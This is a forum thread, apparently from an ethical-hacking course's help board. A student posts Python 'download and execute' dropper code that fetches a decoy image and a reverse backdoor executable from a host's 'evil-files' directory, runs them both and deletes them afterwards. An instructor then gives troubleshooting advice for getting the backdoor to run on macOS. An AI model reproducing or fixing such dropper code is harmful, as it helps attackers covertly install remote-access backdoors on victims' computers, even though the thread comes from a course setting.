- This topic has 6 replies, 2 voices, and was last updated 3 years, 8 months ago by
.
-
Posts
-
Hello Diego,
I am having an issue with the download and execute on my Mac (not on the same network). When I run the same code on a Windows machine (not virtual) the code works fine and I am able to download a file (jpg or pdf) and the reverse backdoor.
With Mac i get this error (I am executing the code from terminal as I wanted to see the error, with the exe it simply doesn’t work):
as-MacBook-Air:Downloads macbookair$ python down_exec.py /bin/sh: Image.jpeg: command not foundCode:
#!/usr/bin/env python import requests, subprocess, os, tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as out_file: out_file.write(get_response.content) temp_directory = tempfile.gettempdir() os.chdir(temp_directory) download("http://192.168.1.104/evil-files/Image.jpeg") subprocess.Popen("Image.jpeg", shell=True) download("http://192.168.1.104/evil-files/reverse_backdoor.exe") subprocess.call("reverse_backdoor.exe", shell=True) os.remove("Image.jpeg") os.remove("reverse_backdoor.exe")I then tried to just download the jpeg and exe and it worked:
Code:
#!/usr/bin/env python import requests, subprocess, os, tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as out_file: out_file.write(get_response.content) #temp_directory = tempfile.gettempdir() #os.chdir(temp_directory) download("http://192.168.1.104/evil-files/photo.jpeg") #subprocess.Popen("Image.jpeg", shell=True) download("http://192.168.1.104/evil-files/reverse_backdoor.exe") #subprocess.call("reverse_backdoor.exe", shell=True) #os.remove("Image.jpeg") #os.remove("reverse_backdoor.exe")I believe the problem is with the subprocess command.
Can you help?
thanks
Hi!
Yeah, in macOS you’ll need to use the command open, if you just give it the name of the file nothing will happen, as you can see in the error message it saids command not found, so it thinks that image.jpg is a command and not a file.
So inside the subprocees call just add the command open befor the name of the file. You can test it directly in macOS terminal to check that it works.Hope it helps!
DiegoThanks Diego,
I am now able to download the JPEG but I have a problem with the backdoor. I added open inside subprocess.call but it does’t execute the exe. Instead it opens the Unarchiver app on screen and no connection gets established . Is open the right command to run the reverse backdoor?
Thanks for your help
Hi Peter!
The problem here is that .exe is a windows only executable. If you want an executable for macOS you’ll need to compile the python script in a mac computer, use the same method as in linux. Executables can be run exactly as in linux.Hope it helps!
DiegoHi Diego,
I am not sure I understand correctly. I compiled the python script on a osx machine using pyinstaller as shown in the lesson and i get an exe. As exe are Windows executable only how do I compile the script into an osx executable? From the social engineering course I learned how to turn bat file into a script but how do I do it with a Python script? As you can see I am very confused.
Thanks for clarifying
Hi Diego,
To clarify my last post, I know how to turn a applescript payload into an application but my problem is to turn a python script into an application for osx.
- You must be logged in to reply to this topic.
